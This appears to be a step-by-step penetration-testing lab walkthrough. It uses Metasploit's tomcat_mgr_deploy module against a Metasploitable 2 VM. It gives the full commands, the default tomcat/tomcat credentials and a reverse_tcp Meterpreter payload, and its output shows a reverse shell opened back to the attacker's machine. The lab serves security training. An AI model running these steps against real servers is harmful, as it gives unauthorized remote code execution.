Tomcat (Apache Tomcat Manager Application Deployer Authenticated Code Execution)

Tomcat (Apache Tomcat Manager Application Deployer Authenticated Code Execution)

Note: these labs are extremely oriented to the results, using a step-by-step guidance. During your progress, try to find more information and understand what you are doing.

Requirements

Kali Linux
The Kali Linux VM (or any other type of installation)

Metaploitable 2

The Metasploitable 2 VM

Metasploitable Framework

Metasploit Framework toolset (installed on Kali Linux by default)

Metasploitable 2 IP

The IP address of the Metasploitable 2 VM. In my case it is 192.168.8.142. This may be different in your specific case.

Kali Linux IP

The IP address of the Kali Linux machine. In my case it is 192.168.8.147. This may be different in your specific case.

Laboratory Workflow

The following describe the different steps to be conducted during the laboratory. You may introduce variations on this and learn from those variations.

1. Launch the Metasploit Framework

msfconsole

2. Use the module

use exploit/multi/http/tomcat_mgr_deploy

set PAYLOAD java/meterpreter/reverse_tcp (this may be optional if your already have a payload configured when you select the module)

3. Check the module options

options

Module options (exploit/multi/http/tomcat_mgr_deploy):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword                   no        The password for the specified username
   HttpUsername                   no        The username to authenticate as
   PATH          /manager         yes       The URI path of the manager app (/deploy and /undeploy will be used)
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                         yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT         80               yes       The target port (TCP)
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                          no        HTTP server virtual host

Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.8.147    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

4. Set the appropriate options

set RHOSTS 192.168.8.142

set RPORT 8180

set HttpUsername tomcat

set HttpPassword tomcat

set LHOST 192.168.8.147

set LPORT 4444

RHOSTS => 192.168.8.142
RPORT => 8180
HttpUsername => tomcat
HttpPassword => tomcat
LHOST => 192.168.8.147
LPORT => 4444

5. Run the exploit

exploit

[*] Started reverse TCP handler on 192.168.8.147:4444 
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux x86"
[*] Uploading 6218 bytes as MdTPiApkM.war ...
[*] Executing /MdTPiApkM/uUFB3Y0B.jsp...
[*] Undeploying MdTPiApkM ...
[*] Sending stage (58829 bytes) to 192.168.8.142
[*] Meterpreter session 2 opened (192.168.8.147:4444 -> 192.168.8.142:58303) at 2023-03-28 18:56:15 -0400

meterpreter >

6. Meterpreter session

Now you have a meterpreter session opened. This session will allow you to interact with the target.

meterpreter >

7. Open a shell on the target machine

shell

meterpreter > shell
Process 1 created.
Channel 1 created.

Video

Video that resumes everything on this laboratory.

Questions

Now that you have completed this exploitation try to answer to following:

  1. Now, what can I do with the exploitation achieved?

  2. Which type of privileges do I have on the exploited target?

  3. How was this accomplished?

  4. Try to learn more about this vulnerability.

PreviousSAMBA (Samba “username map script” Command Execution)NextApache (CGI Argument Injection)

Last updated